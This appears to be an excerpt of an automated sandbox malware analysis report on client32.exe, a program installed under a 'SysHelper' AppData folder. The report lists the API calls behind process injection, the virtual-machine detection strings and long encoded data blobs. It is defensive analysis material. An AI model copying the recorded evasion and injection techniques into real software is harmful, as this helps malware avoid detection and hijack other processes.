                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_685A3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 685A3226h7_2_685A3130
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,7_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,8_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11123570 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,8_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,8_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,_memset,WriteFile,8_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11107FE0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,8_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,8_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11064E30
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: unins000.dat.1.drBinary or memory string: K33kSIWfuHhZXRVN/FJzyTDU56C+/GhzewmB5cCI4G/wVvY9gXQrVd1MMGCUnL90lf5H2Wi+g01xtobYeTu8MXHKUbuoLgE7H1VedSJqF5oRyKgjeLw+GGkgnq/3AG9Vd6j/wdIFZBUxzRk2n9tWtV3JwezlWhdVmLdhwNhOKeSc0832W1I60DbuB3QIM0g+o1BjY39EdCRcnuyjvwMPF8yKhjot428DnN6AH33lfvJzc5u3xzLPUvdZBfppf5Xfw5HGFvFsnwvh1vy73uPzfdaTR0/7k/bucOT4a+LMT2HMTPP/G/wkNFBZEBZmC3EGhoFhQUSmiy/DFX4KQvSlCOqhvCykIIYIUIRVJLdKA9CIbVSa9gENJj/ypqDXX+mnDtWnaBm0n2P6Mdk3dT3/TkukZflX71YLD64j4GanP0NdCfz/Uv+o/9Tg0Bc2L0xXIqhHqq/dmuo8epifpVbWLVjNsw0cGtYSbHmvMNlYbG43txjlgmPzmE8fMbVKznFnHbGV2NoeZ483p5kpzrxkXbJ8CDqYMeL6vNcjaAo5/ZH21MsMV9mJTgWRyh19Ou4Btqpm3sqNnLrToGee2EwKGHgFXfUZNjIjtpfKGenu8c94D743cjc1/gwecpGrJL/KCcM11cc6TxEyxB475lAj1c/uuH6hZVnIqeA9EpOyfX+H/qTqabyIuP/rxgqS/ZvY0CtoE44IZ8C1XpAY9myLkg+qdT0MCUgpnXZ80Jb3VfIlz5BmJrSXVooBY2bViQPwmqrdwNiL3uHYZuJ9br6a31qfq85WPPqZf0T/qP4BaSakLH10fp7tS3ZU7Rhk10bgP9P1L46cxwBxrzjTXQd+/Mb+byawoYI88uS7/1dEzBop/ijXjV2dPXkagYO1fO2dj2/HtxFD84XZKO7o2JCe0EkGk2/am/9radNI++/87qyG2E99J7IQ64f9nFcx/bh0fOk/hE944H/697+kycO1v5E0o8ia7lwe+sr7XFZ5qrDfb26m6gM54V7y73jM1HzEGT8BT8LQ8D1CkIm8O1pnI5yCvtsLNn4J2usff8588jkgmouDrCTKrEN5xFTVBrxVyaRTYaJG62ZQ7sk6La+Kl+CR+ioRQT6X8Cup+s5dSTbP9Bf4yf5O/C4r6LPjpkx8/yByUCMoFVYJewZBgVbBeKuqQkLsp1JzqNaSftlhbCp/+mEYYOY18eE+FjeLGdOOTUc1cZu40w630Vlb1burAl3a2pqvvmnetXCy/YoOBbCybw5awTvZQMHJ5p4ozGFH9yHnhxAQX2G5VuKpW7nBXTg3d5p5yb+DU0nge9E4/nNVuj4OLi8A1rICTKi2aiY7g3NciFrRLU1nr+SaFqlM5Q+6R2togfZQ+ASpuvr5CzTA/pT/XY1MDzNiLTqBTFScmgo+sYgwxxivOuw60fKfmARU1m5idkKn7zefmJCsDYqkwq8iqq/6Fdqw7G4UM3aVqHT9De8e1KTT3CjuD0xCOaJmz0bnk3IOODgXDyUq01dBtB5CtT9wkXnIvp5cPzFbZq+VN8zYqxojgabiLrC3DO/D+fAxydyac0F6l4h4qHRdTyO6wLPCMDjC0F7J5scjlv/TfQZVlg9qdFmwNduFNhavvWbmRka3JDPKUfCJJNB/oVwNMuUjVsRnQDTX1Zvo8fYm+8de0hrd6CDCO0iq0rrqxH0ZH0xn0d7oYOHcLuiyukcxICw71kZO1oXw3QaHFg6OJrncchXO6ZN5RiJZZKbO61norIWutqklmgv/vsig7s53b1mxm+3YRu4LdA457GfLuNLLtif3Wzqp6Fus4TZw+zki19WovcO6l09Jt5+5Qe/HuuC/cb25C6LMCXnEoNFlh0RY5dBz+Q+DkusJnj+UH4Cpq4nxmi4P+W7WvNhS8kSNgQZFgTDAZp3QIXHtR7tAJDVfaqxbpR7YhXlKrmVKFgFqVtQVQqhu1U1opvYXeFjG0Vr+o9kL3pi9oEiC+a9Q0ZhjF4eg2m/etH9D12ZgOrCkMvVCVtUGU72SPWC2waDN7pn3Ofg29EF/12rtq
                                  Source: client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMware
                                  Source: client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla]h*
                                  Source: powershell.exe, 00000005.00000002.2177091666.000000000756D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: unins000.dat.1.drBinary or memory string: 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
                                  Source: client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: client32.exe, 00000007.00000003.2067867442.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.2067853016.00000000030ED000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWisement (ICMPv6-In)LMEM
                                  Source: unins000.dat.1.drBinary or memory string: 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
                                  Source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3638542031.000000000044E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: TCCTL32.DLL.5.drBinary or memory string: VMWare
                                  Source: unins000.dat.1.drBinary or memory string: AYjgDCKVXTQPQHjASBQAWaCysPaouXOM/pZ0ZdDfofBYVFJ1CankUJIUbhxFCpMAf4OU7rMMwBx7P40K/kgYjI+igq6cD1NU0M2pIAzYzOlADg1U8HaKCr5x/ipUACQAYn+2LVHRuDCRRgmCQgk3XUnO1GlUwEng9JlL6bw2jV/gcdUY/GIBDKN7gUamDqOP2Zw+zmr7tf1IH/055+rLS/5e+qg6N6yBt/IqmnQlUCVk9+qIWYDQuSDzf7Te986OqFdB7KxsWssNG17RJFLPppBK1pu0tYTUWkLqH64i/vw/xu+nsavjF0QArzaF34z/0XqfiP0d+M38v8QvrvdhclVWKLTcRIYHrM7WB0tiqM/wusDmIATsCItEBvSReFawO0uazUdojNp6URP8KAuae7a+/Pa/d5yu+yyRaNTdzuug675Q5UJNU/7tf7vC8Cc6Xics4wIVf1e1xhHVNsFCUH87otUa12UfIiz3MWsMsCxaY4jimIJiWOjmMWu+2i2oAbkdacj9cvhsAYm+gJmaFKzC/LU/chrJgVNR5IwxjZAA7jRauv3vpaVbPh2N3JaFIFwXAH6JjnRNrNPQ0sFZP1UP1AwQ/AdBcA4hCAMEcgbHdmwI24DrnA8Aju4MjuRIt8ABytmPjekWciL2JBy//utobJsQ2wlrPPtYo3EUso+lkJ22XDr96nBKdpN96fykTiwgXt79RzpkwqxTNgDrdmkvwdcXUl8DPWlyH+cvXNirhEUFMPndeCaS9AelSFUJLUixM7TH1g7U4QSmE4SezKYj/UcLjEcuBjIpRwUIEvdyYTN32LRh1ff8NlXj/2h92i9VHzrO4BXifTer8Q3MLVoH6f6b4fVMFo8kMlhX8L+vC35ynRZm7GxtPJj4BlSaC5Xu7+8sUB8ZCGRStrm0DRls13zVOhg48FUrCtYBEqwDJFgHSLD+l2Hz4xfX35LJagsMLUvWqSXdOkPLKuDmKu0lbXxtQmn51YDQxhCGt64Gwy+uuh5yKDoGtQKHZ/dweKZGzuiYrjklDrGuSA/KQYaWEzgOjmk7U50yQemUKYYW4E+GdCFqdK4jF0fnS3VmJer5ypoFIlpMNDzzRCKNlQeIlQeIlQf0p7+dGCV/5AXjBYbQRLr9l4+bjoXMWsxsM2GMo03x4U7L7fImMsyTX72/SBWMC6vr6ndvRvuA/pk8yxg5fkFmHvMox+5NZEzQPZNZC+ogS3GNCpKbILnRPnSGLD/+V8xSgFnGiP3+2VSBzFYQjGesvpG5i5l1JvrEQQPQSDToqQY1c33nUvBCbDCug3Qj0qzWy4/1p4qUb0qDN54XqAO0MFwpmxA5M0Znl629aRmEMZNMPJuWZGwQ7r0wBMKkdBCMXwKEWZf+Jgifxf4mCEXxIRBU6SAIhtBalUIgwmrovJkcnJF1vDqQXgdSUuHVKWnCxaGesRVymhiLGPovpVGcLuAos+ZDye4iDsVYfT5zYKhka9HVISgaTKVLjm8c3nlej/zdP2WrGEqLwTadB7BeV4j29WkzAWv47m/xSrTRy7rkw3/iqvtL2YEH0L4GYKhu8bDEf3yJErOuUMJfxFVVPF5o2JZtWrIHYwz1+02W87XokwnVhG57l2Yb9mev/M8jCg+Y0fYbFYGoeWDbUMnktskKJUPDbnhZq+p5kVQz9EpbjS+nIL5mRKHp/K0m4XtiUpo+eHfm1e9f0rwhkcshh0fcteIiWcO8mNJS2HsKT6K24P6SeS+mMm9Bf0Ti3k0XyTLZRXIn/3QWsITQCcPTCaiqptfDz8jF0AaIflmlElSBMrYLSw3WLVIZGj7IxDPak3TYNVmFJ/o66KfKRV40urPhbF6ul7vyOr0jM6WhsELRUFiRrqGAL77WOaih8GLfYFJDYQkVT3Fb5+D5euNQXMVQiSjLYYn4CyWWom/rOTvaZuSq64qY1E2HkAijx+F0eZXkik61bxWUK8+diKc2Be2hF6Blqt0P/mJaLofzS+mMh8KBLJ5VzbYgbti8glDYX6Agxi6FDvMDSK7TkUosSfUXsbPaQ714
                                  Source: unins000.dat.1.drBinary or memory string: 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
                                  Source: unins000.dat.1.drBinary or memory string: PVgb51/FIfmCqXE3BYOp62AOpRTcHzwmxW63FU/99o1SPDXouMKt2H4UbT8qu/RO8iK2n11KxoHRYCE7WvBZc+9fzhhHygiA4GRRePNNXHZ18m7T92x8aqae6U7qjyjDn7aY3iiDm8f4TIHesLrYVML8gCA3mv5CkJcwB7DWcQ5HO+IxKWJchvHdj/2vYDzVN8hPngQY31+tcuVVq5jRAozmxlaQ5l6hkK5CyzMKlAwjVvB2KoycxOWdHBPF7i6LVAWvwqPfyavQf16r+2T2Ba3DwBE0fr4YAVsLY8PHdXUAIEDn7uSdw8pgNTDYLVjFOxipRDNPibHXkbl/APcybC72wwg0hnJwMD9Cm3gKg6yaS8fSFj5sGiHhQza9npRMDMelv1eQll7vaBgJI5xyxI949D7iaTqkDDTrCZF4NlLiuWtuIPE8M/d/tbC5viEcfdxHPH1wSTvznYvMukK14YtiIcLbkYqzOzaLO7WtiOiTw3T5QJm5/1HfAYi24PYbgMVpdCSMwvMPhwPWL45UH/T5fx8XwfINJQl6FxMtxRyvnwSgmWMnDz/6j0Dz9hWCxuBmMQYCZjz+3EUB5msn3zyCU0fssZONB9BNaRfYavFx3gUnmqBQlR10wwMoyeNl8MSKA8+sTs2sMqwsziDPHEI45YFmP/aR1nCqCIKTYZSEX+R3DbRbnECfyX7nkh+zz/aekjAwrEezqOWRr/0K/3FNc+vCYASuSYIZW5NPoHaDr6Zn13HZDVx2rVednn9zAtNYFDHmHmbwmPlM3zGLgE3dUaEsykeLKJsaB2r0V+owoK2OrsxmtbfDV+j6ha+a5N3j04si7AXFhoISjN56fOmXqjSVyr3bUIDXyhm2FbsarIbn0I5ilrpIgqGgHm0U0pG5M4OZ4CJxzBAXiWL6uIjW4OZwJ8jcYHDvU2GsSQPGmrj2GmtK4bPj6Zqt8FFfmmZwf0TT02o+pMVq